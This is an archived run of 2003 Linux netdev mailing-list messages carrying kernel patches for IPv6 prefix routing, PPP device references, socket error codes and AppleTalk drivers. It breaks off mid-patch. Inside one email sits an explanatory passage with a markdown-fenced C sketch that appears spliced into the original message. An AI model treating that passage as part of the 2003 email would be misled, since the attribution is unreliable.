netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev CC: netdev In article <20030709195237.A8550@horus.imag.fr> (at Wed, 9 Jul 2003 19:52:37 +0200), Jean-Luc Richier says: > There is a bug in IPv6 route calculation since kernel 2.5.71. It affects > all routes with prefix length != 0 (mod 8) > The bug is as follows: > do: ip -6 route add 2000::/3 via 2001:688:121:10::1 > ip -6 route > It shows a route for ::/3, not for 2000::/3 good catch. > PATCH 2: avoid overwriting the set value > --- linux-2.5.74/include/net/ipv6.h.DIST 2003-07-02 22:53:44.000000000 +0200 > +++ linux-2.5.74/include/net/ipv6.h 2003-07-09 18:51:25.000000000 +0200 > @@ -276,8 +276,10 @@ > b = plen & 0x7; > > memcpy(pfx->s6_addr, addr, o); > - if (b != 0) > + if (b != 0) { > pfx->s6_addr[o] = addr->s6_addr[o] & (0xff00 >> b); > + o++; > + } > if (o < 16) > memset(pfx->s6_addr + o, 0, 16 - o); > } > Ok, let's use this one. --yoshfuji From yoshfuji@linux-ipv6.org Wed Jul 9 11:43:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:43:15 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Ih92x004614 for ; Wed, 9 Jul 2003 11:43:10 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h69IiQBo025781; Thu, 10 Jul 2003 03:44:26 +0900 Date: Thu, 10 Jul 2003 03:44:25 +0900 (JST) Message-Id: <20030710.034425.55677522.yoshfuji@linux-ipv6.org> To: davem@redhat.com, jmorris@intercode.com.au CC: Jean-Luc.Richier@imag.fr, pekkas@netcore.fi, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: Bug in Linux 2.5.74 IPv6 routing From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710.033117.93244305.yoshfuji@linux-ipv6.org> References: <20030709195237.A8550@horus.imag.fr> <20030710.033117.93244305.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: 
http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3868 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710.033117.93244305.yoshfuji@linux-ipv6.org> (at Thu, 10 Jul 2003 03:31:17 +0900 (JST)), YOSHIFUJI Hideaki / $B5HF#1QL@(B says: > Ok, let's use this one. Please apply this patch. D: Fix ipv6_addr_prefix() for prefixlen != 0 (mod 8). D: Patch from Jean-Luc RICHIER . --- linux-2.5.74/include/net/ipv6.h.DIST 2003-07-02 22:53:44.000000000 +0200 +++ linux-2.5.74/include/net/ipv6.h 2003-07-09 18:51:25.000000000 +0200 @@ -276,8 +276,10 @@ b = plen & 0x7; memcpy(pfx->s6_addr, addr, o); - if (b != 0) + if (b != 0) { pfx->s6_addr[o] = addr->s6_addr[o] & (0xff00 >> b); + o++; + } if (o < 16) memset(pfx->s6_addr + o, 0, 16 - o); } -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From garzik@gtf.org Wed Jul 9 11:44:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:44:10 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Ihu2x004834 for ; Wed, 9 Jul 2003 11:43:57 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id E83A46643; Wed, 9 Jul 2003 14:14:59 -0400 (EDT) Date: Wed, 9 Jul 2003 14:14:59 -0400 From: Jeff Garzik To: Ben Greear Cc: Matthew Wilcox , netdev@oss.sgi.com, "David S. 
Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops Message-ID: <20030709181459.GE15293@gtf.org> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <3F0C4CA8.7090502@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0C4CA8.7090502@candelatech.com> User-Agent: Mutt/1.3.28i X-archive-position: 3869 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 09, 2003 at 10:11:04AM -0700, Ben Greear wrote: > Also, for the strings (labels) passed back to user space, is there any > documentation for suggested values for these strings? Even though we > can't be completely type-safe, if there were suggested values in > a comment in the code, it could help a great deal for any code trying to > parse them for multiple different drivers/nics. The strings represent NIC-specific attributes. 
Jeff From shemminger@osdl.org Wed Jul 9 11:45:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:45:10 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Ij52x005283 for ; Wed, 9 Jul 2003 11:45:06 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69IhYI03705; Wed, 9 Jul 2003 11:43:35 -0700 Date: Wed, 9 Jul 2003 11:43:34 -0700 From: Stephen Hemminger To: "Paul Rolland" , cfriesen@nortelnetworks.com, paulus@samba.org Cc: linux-ppp@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [BUG]: problem when shutting down ppp connection since 2.5.70 Message-Id: <20030709114334.5b8cf7c6.shemminger@osdl.org> In-Reply-To: <008201c343a3$0f9f8a70$2101a8c0@witbe> References: <3F03BC55.6050506@nortelnetworks.com> <008201c343a3$0f9f8a70$2101a8c0@witbe> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3870 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev The problem is that some protocol is still holding a reference to the device. This is a bug in the protocol, and needs to be fixed (ie not a ppp bug). Try building a kernel with only IPv4, eliminate all others then add back until you find the culprit. The following patch may help also. 
diff -Nru a/net/core/dev.c b/net/core/dev.c --- a/net/core/dev.c Wed Jul 9 11:40:56 2003 +++ b/net/core/dev.c Wed Jul 9 11:40:56 2003 @@ -72,6 +72,8 @@ * - netif_rx() feedback */ +#define DEBUG 1 + #include #include #include @@ -2704,6 +2706,8 @@ goto out; } +extern void dst_dumpref(const struct net_device *dev); + static void netdev_wait_allrefs(struct net_device *dev) { unsigned long rebroadcast_time, warning_time; @@ -2740,6 +2744,30 @@ current->state = TASK_RUNNING; if (time_after(jiffies, warning_time + 10 * HZ)) { +#ifdef DEBUG + dst_dumpref(dev); + + if (dev->atalk_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as AppleTalk device\n", dev->name); + if (dev->ip_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as IPv4 device\n", dev->name); + + if (dev->dn_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as DECnet device\n", dev->name); + if (dev->ip6_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as IPv6 device\n", dev->name); + + if (dev->ec_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as Econet device\n", dev->name); + if (dev->ax25_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as AX.25 device\n", dev->name); +#endif printk(KERN_EMERG "unregister_netdevice: " "waiting for %s to become free. 
Usage " "count = %d\n", diff -Nru a/net/core/dst.c b/net/core/dst.c --- a/net/core/dst.c Wed Jul 9 11:40:56 2003 +++ b/net/core/dst.c Wed Jul 9 11:40:56 2003 @@ -41,6 +41,21 @@ static struct timer_list dst_gc_timer = TIMER_INITIALIZER(dst_run_gc, 0, DST_GC_MIN); + +void dst_dumpref(const struct net_device *dev) +{ + struct dst_entry *dst; + int count = 0; + + spin_lock_bh(&dst_lock); + for (dst = dst_garbage_list; dst; dst = dst->next) { + if (dst->dev == dev) ++count; + } + spin_unlock_bh(&dst_lock); + + printk(KERN_INFO "dst route cache has %d references\n", count); +} + static void dst_run_gc(unsigned long dummy) { int delayed = 0; From andrius@andrius.org Wed Jul 9 12:12:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 12:12:36 -0700 (PDT) Received: from hl.kalnieciai.lt (postfix@hl.kauneta.net [212.47.103.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69JCP2x006932 for ; Wed, 9 Jul 2003 12:12:28 -0700 Received: by hl.kalnieciai.lt (Postfix, from userid 1430) id 29CD94F228; Wed, 9 Jul 2003 22:12:23 +0300 (GMT-3) Received: from localhost (localhost [127.0.0.1]) by hl.kalnieciai.lt (Postfix) with ESMTP id 252354F226; Wed, 9 Jul 2003 22:12:23 +0300 (GMT-3) Date: Wed, 9 Jul 2003 22:12:23 +0300 (GMT-3) From: Andrius Kasparavicius X-X-Sender: andrius@hl.kauneta.net To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? In-Reply-To: <3F0C4DBD.8020007@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3871 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andrius@andrius.org Precedence: bulk X-list: netdev is there a clear list of which cards "works without patch", which "need patches/mtu changes" and which "never seen working"? 
Andrius On Wed, 9 Jul 2003, Ben Greear wrote: > Andrius Kasparavicius wrote: > > hello, as far as i know, currently there is no native vlan support in > > network device drivers. I mean, always need patching MTU.. add 4 bytes.. > > :-( > > > > is there any problems to include full vlans support? > > Intel's e100 driver (and all NICs supported by it) support vlans > fine, as do most of the GigE NICs. Tulip does not, last I hear, though > a work-around patch has been around forever. Realtek worked at one time, > not sure about now though... From tgr@reeler.org Wed Jul 9 12:36:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 12:36:50 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Jag2x000331 for ; Wed, 9 Jul 2003 12:36:45 -0700 Received: by reeler.org id 19aKjs-0003SC-00 ; Wed, 09 Jul 2003 21:36:28 +0200 Date: Wed, 9 Jul 2003 21:36:28 +0200 From: Thomas Graf To: davem@redhat.com Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: [PATCH] make {send|recv}msg return code 1003.1 compatible Message-ID: <20030709193628.GR2702@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 3872 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello 1003.1 says: [EMSGSIZE] The msg_iovlen member of the msghdr structure pointed to by message is less than or equal to 0, or is greater than {IOV_MAX}. The patch changes the return code of {send|recv}msg from EINVAL to EMSGSIZE. 
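For readers who want to see the rule in isolation, here is a minimal user-space sketch of the 1003.1 wording quoted above. It is not the kernel code: the function name sketch_check_iovlen() and the constant SKETCH_IOV_MAX are made up for illustration, and the value 1024 is only an assumed stand-in for {IOV_MAX}. Note that the patch itself only changes the error code of the existing "greater than UIO_MAXIOV" test; the "less than or equal to 0" branch below comes from the spec text, not from the patch.

```c
#include <errno.h>

/* Assumed stand-in for {IOV_MAX} / UIO_MAXIOV; hypothetical name and value. */
#define SKETCH_IOV_MAX 1024

/*
 * Hypothetical helper: return 0 if the iovec count is acceptable,
 * or -EMSGSIZE if it is <= 0 or larger than the limit, following
 * the 1003.1 text quoted in this message (instead of -EINVAL).
 */
static int sketch_check_iovlen(long iovlen)
{
	if (iovlen <= 0 || iovlen > SKETCH_IOV_MAX)
		return -EMSGSIZE;
	return 0;
}
```

A caller would run this check before walking the iovec array and propagate the negative value as the syscall result.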
-- thomas Index: net/socket.c =================================================================== RCS file: /cvs/tgr/linux-25/net/socket.c,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 socket.c --- net/socket.c 9 Jul 2003 18:42:29 -0000 1.1.1.1 +++ net/socket.c 9 Jul 2003 19:17:29 -0000 @@ -1614,7 +1614,7 @@ goto out; /* do not move before msg_sys is valid */ - err = -EINVAL; + err = -EMSGSIZE; if (msg_sys.msg_iovlen > UIO_MAXIOV) goto out_put; @@ -1713,7 +1713,7 @@ if (!sock) goto out; - err = -EINVAL; + err = -EMSGSIZE; if (msg_sys.msg_iovlen > UIO_MAXIOV) goto out_put; From shemminger@osdl.org Wed Jul 9 13:13:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 13:13:30 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69KDH2x001106 for ; Wed, 9 Jul 2003 13:13:18 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69KD0I25600; Wed, 9 Jul 2003 13:13:00 -0700 Date: Wed, 9 Jul 2003 13:13:00 -0700 From: Stephen Hemminger To: "David S. Miller" , Jay Schulist Cc: netdev@oss.sgi.com, linux-atalk@lists.netspace.org Subject: [[RFT] convert appletalk over to new protocol Message-Id: <20030709131300.660c052f.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3873 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev This fixes appletalk ddp protocol to address a couple of issues: - routing code was holding a reference to device without doing ref counting. 
- packet interface was old style - add shared buffer checks - add pullup's where needed - change checksum to handle fragmented sk_buff's - clean up comments to match above changes. I don't have real appletalk test infrastructure, and given the checksum change it should be tested against real Apple hardware. It does build, and loads/unloads fine. I can bring up the netatalk stuff without problem but have nothing to talk to it. diff -Nru a/net/appletalk/ddp.c b/net/appletalk/ddp.c --- a/net/appletalk/ddp.c Wed Jul 9 12:55:00 2003 +++ b/net/appletalk/ddp.c Wed Jul 9 12:55:00 2003 @@ -239,6 +239,7 @@ while ((tmp = *iface) != NULL) { if (tmp->dev == dev) { *iface = tmp->next; + dev_put(dev); kfree(tmp); dev->atalk_ptr = NULL; } else @@ -256,6 +257,7 @@ goto out; iface->dev = dev; + dev_hold(dev); dev->atalk_ptr = iface; iface->address = *sa; iface->status = 0; @@ -665,9 +667,13 @@ static int ddp_device_event(struct notifier_block *this, unsigned long event, void *ptr) { - if (event == NETDEV_DOWN) + switch (event) { + case NETDEV_DOWN: + case NETDEV_UNREGISTER: /* Discard any use of this */ atalk_dev_down(ptr); + break; + } return NOTIFY_DONE; } @@ -935,13 +941,10 @@ * Checksum: This is 'optional'. It's quite likely also a good * candidate for assembler hackery 8) */ -unsigned short atalk_checksum(struct ddpehdr *ddp, int len) -{ - unsigned long sum = 0; /* Assume unsigned long is >16 bits */ - unsigned char *data = (unsigned char *)ddp; - len -= 4; /* skip header 4 bytes */ - data += 4; +static unsigned long atalk_sum_partial(const unsigned char *data, + int len, unsigned long sum) +{ /* This ought to be unwrapped neatly. 
I'll trust gcc for now */ while (len--) { @@ -953,10 +956,94 @@ } data++; } + return sum; +} + +/* Checksum skb data -- similar to skb_checksum */ +static unsigned long atalk_sum_skb(const struct sk_buff *skb, int offset, + int len, unsigned long sum) +{ + int start = skb_headlen(skb); + int i, copy; + int pos = 0; + + /* checksum stuff in header space */ + if ( (copy = start - offset) > 0) { + if (copy > len) + copy = len; + sum = atalk_sum_partial(skb->data + offset, copy, sum); + if ( (len -= copy) == 0) + return sum; + offset += copy; + pos = copy; + } + + /* checksum stuff in frags */ + for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) { + int end; + + BUG_TRAP(start <= offset + len); + + end = start + skb_shinfo(skb)->frags[i].size; + if ((copy = end - offset) > 0) { + u8 *vaddr; + skb_frag_t *frag = &skb_shinfo(skb)->frags[i]; + + if (copy > len) + copy = len; + vaddr = kmap_skb_frag(frag); + sum = atalk_sum_partial(vaddr + frag->page_offset + + offset - start, copy, sum); + kunmap_skb_frag(vaddr); + + if (!(len -= copy)) + return sum; + offset += copy; + pos += copy; + } + start = end; + } + + if (skb_shinfo(skb)->frag_list) { + struct sk_buff *list = skb_shinfo(skb)->frag_list; + + for (; list; list = list->next) { + int end; + + BUG_TRAP(start <= offset + len); + + end = start + list->len; + if ((copy = end - offset) > 0) { + if (copy > len) + copy = len; + sum = atalk_sum_skb(list, offset - start, + copy, sum); + if ((len -= copy) == 0) + return sum; + offset += copy; + pos += copy; + } + start = end; + } + } + + BUG_ON(len > 0); + + return sum; +} + +static unsigned short atalk_checksum(const struct sk_buff *skb, int len) +{ + unsigned long sum; + + /* skip header 4 bytes */ + sum = atalk_sum_skb(skb, 4, len-4, 0); + /* Use 0xFFFF for 0. 0 itself means none */ return sum ? htons((unsigned short)sum) : 0xFFFF; } + /* * Create a socket. Initialise the socket, blank the addresses * set the state. 
@@ -1335,25 +1422,26 @@ static int atalk_rcv(struct sk_buff *skb, struct net_device *dev, struct packet_type *pt) { - struct ddpehdr *ddp = ddp_hdr(skb); + struct ddpehdr *ddp; struct sock *sock; struct atalk_iface *atif; struct sockaddr_at tosat; int origlen; struct ddpebits ddphv; - /* Size check */ - if (skb->len < sizeof(*ddp)) + /* Don't mangle buffer if shared */ + if (!(skb = skb_share_check(skb, GFP_ATOMIC))) + goto out; + + /* Size check and make sure header is contiguous */ + if (!pskb_may_pull(skb, sizeof(*ddp))) goto freeit; + ddp = ddp_hdr(skb); /* * Fix up the length field [Ok this is horrible but otherwise * I end up with unions of bit fields and messy bit field order * compiler/endian dependencies..] - * - * FIXME: This is a write to a shared object. Granted it - * happens to be safe BUT.. (Its safe as user space will not - * run until we put it back) */ *((__u16 *)&ddphv) = ntohs(*((__u16 *)ddp)); @@ -1374,7 +1462,7 @@ * valid for net byte orders all over the networking code... */ if (ddp->deh_sum && - atalk_checksum(ddp, ddphv.deh_len) != ddp->deh_sum) + atalk_checksum(skb, ddphv.deh_len) != ddp->deh_sum) /* Not a valid AppleTalk frame - dustbin time */ goto freeit; @@ -1433,14 +1521,16 @@ if (!ap || skb->len < sizeof(struct ddpshdr)) goto freeit; + + /* Don't mangle buffer if shared */ + if (!(skb = skb_share_check(skb, GFP_ATOMIC))) + return 0; + /* * The push leaves us with a ddephdr not an shdr, and * handily the port bytes in the right place preset. 
*/ - - skb_push(skb, sizeof(*ddp) - 4); - /* FIXME: use skb->cb to be able to use shared skbs */ - ddp = (struct ddpehdr *)skb->data; + ddp = (struct ddpehdr *) skb_push(skb, sizeof(*ddp) - 4); /* Now fill in the long header */ @@ -1583,6 +1673,7 @@ SOCK_DEBUG(sk, "SK %p: Copy user data (%d bytes).\n", sk, len); + /* TODO: copy and checksum in one pass */ err = memcpy_fromiovec(skb_put(skb, len), msg->msg_iov, len); if (err) { kfree_skb(skb); @@ -1592,7 +1683,7 @@ if (sk->sk_no_check == 1) ddp->deh_sum = 0; else - ddp->deh_sum = atalk_checksum(ddp, len + sizeof(*ddp)); + ddp->deh_sum = atalk_checksum(skb, len + sizeof(*ddp)); /* * Loopback broadcast packets to non gateway targets (ie routes @@ -1801,11 +1892,13 @@ struct packet_type ltalk_packet_type = { .type = __constant_htons(ETH_P_LOCALTALK), .func = ltalk_rcv, + .data = (void *) 1, }; struct packet_type ppptalk_packet_type = { .type = __constant_htons(ETH_P_PPPTALK), .func = atalk_rcv, + .data = (void *) 1, }; static unsigned char ddp_snap_id[] = { 0x08, 0x00, 0x07, 0x80, 0x9B }; From shemminger@osdl.org Wed Jul 9 13:13:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 13:13:49 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69KDh2x001125 for ; Wed, 9 Jul 2003 13:13:44 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69KDYI25700; Wed, 9 Jul 2003 13:13:34 -0700 Date: Wed, 9 Jul 2003 13:13:34 -0700 From: Stephen Hemminger To: Jeff Garzik , Jay Schulist Cc: netdev@oss.sgi.com, linux-atalk@lists.netspace.org Subject: [PATCH 2.5.74] convert appletalk/ipddp to dynamic allocation Message-Id: <20030709131334.79df4dca.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ 
/`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3874 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Part of the continuing campaign to fix all network devices to allocate dynamically. Built, loaded/unloaded and configured but don't have real test environment to communicate with other hosts. diff -Nru a/drivers/net/appletalk/ipddp.c b/drivers/net/appletalk/ipddp.c --- a/drivers/net/appletalk/ipddp.c Wed Jul 9 12:55:44 2003 +++ b/drivers/net/appletalk/ipddp.c Wed Jul 9 12:55:44 2003 @@ -72,17 +72,8 @@ printk("%s: Appletalk-IP Decap. mode by Jay Schulist \n", dev->name); - /* Fill in the device structure with ethernet-generic values. */ - ether_setup(dev); - /* Initalize the device structure. */ dev->hard_start_xmit = ipddp_xmit; - - dev->priv = kmalloc(sizeof(struct net_device_stats), GFP_KERNEL); - if(!dev->priv) - return -ENOMEM; - memset(dev->priv,0,sizeof(struct net_device_stats)); - dev->get_stats = ipddp_get_stats; dev->do_ioctl = ipddp_ioctl; @@ -281,7 +272,7 @@ } } -static struct net_device dev_ipddp; +static struct net_device *dev_ipddp; MODULE_LICENSE("GPL"); MODULE_PARM(ipddp_mode, "i"); @@ -290,29 +281,33 @@ { int err; - dev_ipddp.init = ipddp_init; - err=dev_alloc_name(&dev_ipddp, "ipddp%d"); - if(err < 0) - return err; + dev_ipddp = alloc_netdev(sizeof(struct net_device_stats), + "ipddp%d", ether_setup); - if(register_netdev(&dev_ipddp) != 0) - return -EIO; + if (!dev_ipddp) + return -ENOMEM; - return 0; + dev_ipddp->init = ipddp_init; + + if((err = register_netdev(dev_ipddp))) + kfree(dev_ipddp); + + return err; } static void __exit ipddp_cleanup_module(void) { struct ipddp_route *p; - unregister_netdev(&dev_ipddp); - kfree(dev_ipddp.priv); + unregister_netdev(dev_ipddp); while (ipddp_route_list) 
{ p = ipddp_route_list->next; kfree(ipddp_route_list); ipddp_route_list = p; } + + kfree(dev_ipddp); } module_init(ipddp_init_module); From shemminger@osdl.org Wed Jul 9 13:24:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 13:24:54 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69KOj2x001792 for ; Wed, 9 Jul 2003 13:24:46 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69KOcI28241; Wed, 9 Jul 2003 13:24:38 -0700 Date: Wed, 9 Jul 2003 13:24:38 -0700 From: Stephen Hemminger To: Jeff Garzik , Jay Schulist Cc: netdev@oss.sgi.com Subject: [PATCH 2.5.74] convert appletalk/ltpc over to dynamic allocation Message-Id: <20030709132438.432fcd2b.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3875 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Part of the continuing campaign to fix all network devices to allocate dynamically. Built, loaded/unloaded and configured but don't have real hardware. --- linux-2.5.74/drivers/net/appletalk/ltpc.c 2003-07-09 13:19:55.000000000 -0700 +++ linux-2.5-sysfs/drivers/net/appletalk/ltpc.c 2003-07-09 13:22:14.000000000 -0700 @@ -884,18 +884,8 @@ /* Initialize the device structure. */ /* Fill in the fields of the device structure with ethernet-generic values. 
*/ - ltalk_setup(dev); dev->hard_start_xmit = ltpc_xmit; dev->hard_header = ltpc_hard_header; - - dev->priv = kmalloc(sizeof(struct ltpc_private), GFP_KERNEL); - if(!dev->priv) - { - printk(KERN_INFO "%s: could not allocate statistics buffer\n", dev->name); - return -ENOMEM; - } - - memset(dev->priv, 0, sizeof(struct ltpc_private)); dev->get_stats = ltpc_get_stats; /* add the ltpc-specific things */ @@ -1169,6 +1159,7 @@ printk(KERN_INFO "Apple/Farallon LocalTalk-PC card at %03x, DMA%d. Using polled mode.\n",io,dma); /* seems more logical to do this *after* probing the card... */ + ltalk_setup(dev); err = ltpc_init(dev); if (err) return err; @@ -1256,11 +1247,10 @@ } __setup("ltpc=", ltpc_setup); -#endif /* MODULE */ -static struct net_device dev_ltpc; +#else /* MODULE */ -#ifdef MODULE +static struct net_device *dev_ltpc; MODULE_LICENSE("GPL"); MODULE_PARM(debug, "i"); @@ -1268,23 +1258,22 @@ MODULE_PARM(irq, "i"); MODULE_PARM(dma, "i"); - -int __init init_module(void) +static int __init ltpc_init_module(void) { - int err, result; + int result; if(io == 0) printk(KERN_NOTICE "ltpc: Autoprobing is not recommended for modules\n"); - /* Find a name for this unit */ - dev_ltpc.init = ltpc_probe; - err=dev_alloc_name(&dev_ltpc,"lt%d"); - - if(err<0) - return err; + dev_ltpc = alloc_netdev(sizeof(struct ltpc_private), "lt%d", + ltalk_setup); + - if ((result = register_netdev(&dev_ltpc)) != 0) { + dev_ltpc->init = ltpc_probe; + + if ((result = register_netdev(dev_ltpc)) != 0) { + kfree(dev_ltpc); printk(KERN_DEBUG "could not register Localtalk-PC device\n"); return result; } else { @@ -1292,7 +1281,6 @@ return 0; } } -#endif static void __exit ltpc_cleanup(void) { @@ -1302,9 +1290,9 @@ if(debug & DEBUG_VERBOSE) printk("freeing irq\n"); - if(dev_ltpc.irq) { - free_irq(dev_ltpc.irq,&dev_ltpc); - dev_ltpc.irq = 0; + if(dev_ltpc->irq) { + free_irq(dev_ltpc->irq,dev_ltpc); + dev_ltpc->irq = 0; } if(del_timer(&ltpc_timer)) @@ -1323,16 +1311,16 @@ if(debug & DEBUG_VERBOSE) 
